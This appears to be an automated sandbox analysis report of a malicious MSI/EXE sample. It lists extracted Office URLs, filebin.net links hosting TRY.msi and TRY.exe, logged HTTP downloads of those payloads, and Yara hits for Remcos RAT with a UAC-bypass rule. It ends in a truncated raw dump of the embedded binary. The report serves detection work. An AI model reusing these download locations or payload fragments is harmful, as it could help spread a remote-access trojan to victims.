Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://api.onedrive.com
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://apis.live.net/v5.0/
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://augloop.office.com
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://augloop.office.com/v2
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://cdn.entity.
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://clients.config.office.net/
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://config.edge.skype.com
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://cortana.ai
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://cortana.ai/api
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://cr.office.com
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://dataservice.o365filtering.com
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://dev.cortana.ai
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://devnull.onenote.com
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://directory.services.
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://edu-mathreco-prod.trafficmanager.net
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://edu-mathsolver-prod.trafficmanager.net
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://enrichment.osi.office.net/
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://entitlement.diagnostics.office.com
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: 54841c.rbs.3.dr	String found in binary or memory: https://filebin.net/rf43v6qzghbj7h7b/
Source: 54841c.rbs.3.dr	String found in binary or memory: https://filebin.net/rf43v6qzghbj7h7b/$
Source: PowerShell_transcript.377142.szj6FUBY.20220420092838.txt.17.dr, files.cab.4.dr	String found in binary or memory: https://filebin.net/rf43v6qzghbj7h7b/TRY.exe
Source: ~DF3D7E64A57D9B524A.TMP.0.dr	String found in binary or memory: https://filebin.net/rf43v6qzghbj7h7b/TRY.msi
Source: ~DF20598E5DAB6B2B3C.TMP.3.dr	String found in binary or memory: https://filebin.net/rf43v6qzghbj7h7b/TRY.msi-180029104309546480
Source: ~DF20725BC976A732BA.TMP.3.dr, ~DF3B9CC377E0CCEDD0.TMP.3.dr, inprogressinstallinfo.ipi.3.dr, ~DFFFE9197EB1FCF16E.TMP.3.dr, ~DFAB5AE087B19AB60D.TMP.3.dr, ~DFAC439D90DB59E05A.TMP.3.dr	String found in binary or memory: https://filebin.net/rf43v6qzghbj7h7b/TRY.msi0C:
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://graph.ppe.windows.net
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://graph.ppe.windows.net/
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://graph.windows.net
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://graph.windows.net/
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://incidents.diagnostics.office.com
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://inclient.store.office.com/gyro/client
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://inclient.store.office.com/gyro/clientstore
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://invites.office.com/
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://lifecycle.office.com
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://login.microsoftonline.com/
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://login.windows.local
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://management.azure.com
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://management.azure.com/
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://messaging.office.com/
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://metadata.templates.cdn.office.net/client/log
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://ncus.contentsync.
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://ncus.pagecontentsync.
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://officeapps.live.com
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://onedrive.live.com
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://onedrive.live.com/embed?
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://osi.office.net
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://otelrules.azureedge.net
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://outlook.office.com
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://outlook.office.com/
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://outlook.office365.com
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://outlook.office365.com/
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://pages.store.office.com/review/query
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://powerlift.acompli.net
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://roaming.edog.
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://settings.outlook.com
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://shell.suite.office.com:1443
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://skyapi.live.net/Activity/
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://staging.cortana.ai
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://store.office.cn/addinstemplate
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://store.office.de/addinstemplate
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://substrate.office.com/search/api/v2/init
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://tasks.office.com
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://web.microsoftstream.com/video/
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://webshell.suite.office.com
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://wus2.contentsync.
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://wus2.pagecontentsync.
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://www.odwebp.svc.ms

Source: unknown

DNS traffic detected: queries for: filebin.net

Source: global traffic	HTTP traffic detected: GET /rf43v6qzghbj7h7b/TRY.msi HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows InstallerHost: filebin.net
Source: global traffic	HTTP traffic detected: GET /filebin/e76b11c6a8df860f25923a54491f9e4705e2029a6f63ff6145f41522a887dd56/e046def2a98a6096ca27aa2b595788057624cf23435c3db476f6bd4946742884?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=HZXB1J7T0UN34UN512IW%2F20220420%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20220420T072814Z&X-Amz-Expires=30&X-Amz-SignedHeaders=host&response-cache-control=max-age%3D30&response-content-disposition=filename%3D%22TRY.msi%22&response-content-type=application%2Fmsword&X-Amz-Signature=81a6b2d7f153c8ae19ac27531faf11add08f39212f5a9e9b8b8b46feec74e3da HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows InstallerHost: situla.bitbit.net
Source: global traffic	HTTP traffic detected: GET /rf43v6qzghbj7h7b/TRY.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: filebin.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /filebin/e76b11c6a8df860f25923a54491f9e4705e2029a6f63ff6145f41522a887dd56/7ff329000ec5f0e56f28414ebbe22f0c0905296169e7398f417a543e662f9503?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=HZXB1J7T0UN34UN512IW%2F20220420%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20220420T072844Z&X-Amz-Expires=30&X-Amz-SignedHeaders=host&response-cache-control=max-age%3D30&response-content-disposition=filename%3D%22TRY.exe%22&response-content-type=application%2Fvnd.microsoft.portable-executable&X-Amz-Signature=c205dd25825136b9a5d453fd33964b1791fdc2217c3bde2a85904dc7ce3c2af9 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: situla.bitbit.netConnection: Keep-Alive

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443

Source: unknown	HTTPS traffic detected: 185.47.40.36:443 -> 192.168.2.5:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 87.238.33.8:443 -> 192.168.2.5:49744 version: TLS 1.2

E-Banking Fraud

Yara detected Remcos RAT

Source: Yara match

File source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\TRY.exe, type: DROPPED

System Summary

Malicious sample detected (through community Yara rule)

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\TRY.exe, type: DROPPED	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\TRY.exe, type: DROPPED	Matched rule: REMCOS_RAT_variants Author: unknown

Document contains OLE streams with names of living off the land binaries

Source: MSI94E.tmp.3.dr	Stream path '\x17163\x16689\x18229\x16766\x18365\x17760\x17636\x16947\x16167\x17896\x17656\x17753\x17074\x16693\x18480' : MSCF....l^......,...............}?..D........^.........T.. .TRY.exe..`.(....MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b1F.._..._..._..kZ..._..k\..._..k[..._..k^..._...^.d._..kW..._..k...._..k]..._.Rich.._.................PE..d......&.........."......t...........y.........@.....................................H....`.......... ......................................,................................... .......T............................................... ............................text...0s.......t.................. ..`.rdata...".......$...x..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc.. ............\..............@..B........................................................................................................................................................................................................................................................................................................E3.H.B.A.....A.W...I;.E.G.E..xGH..t"L+.L+.I...H..t.A.....t...H..H...u.H..H.A.H.E.H..E..A..A..z........H..t....A.........E3.L..M..H..A.W...I.B.H=....E.G.E..x5I..H..M..t..8.t.H..H...u.H..H..E..A..E#.H..t.M..L+...E3.E..xXI..I...I+.t.H..M......I+.L..L+.M..t.A.....t...I..H..H...u.H..H.B.H.E.H..E..A..A..z......A.........L.D$.L.L$ SVWH.. 3.H.B.H=....H...W....G...x5H.Z.H..H..L.L$X3.........x.H.H;.w.u.@.<3..@.<3.z.....H..t......H.. _^[..........H.\$.H.l$.VWAVH......H..,...H3.H.D$pL..f.D$l..3.H.........l$h......H..H........H......H....1...H..H..taH.D$`A..H.D$PD.E .l$HH.L$h.l$@.}..l$8A. ....l$0...l$(.l$ ...~....t.H.T$`M..3.H........H.L$`...~..H..........H.L$pH3...i..L..$....I.[(I.k0I..A^_^.........H..H.X.H.p.H.x.L.p UH.h.H......H.."...H3.H.EG..Y...E3.D.u?f.EC..D.u'A.^.;...P...H.M'.........&.........H..L.E/.S....~......!...H.M/H.E+E3.H.D$ E3......}.............~....z.......U+3...<...H..H........D.M+H.E+H.M/L....H.D$ ..t}..........H.E7A. ...H.D$PH.M?D.t$HA. ...D.t$@..D.t$8D.t$0D.t$(D.t$ 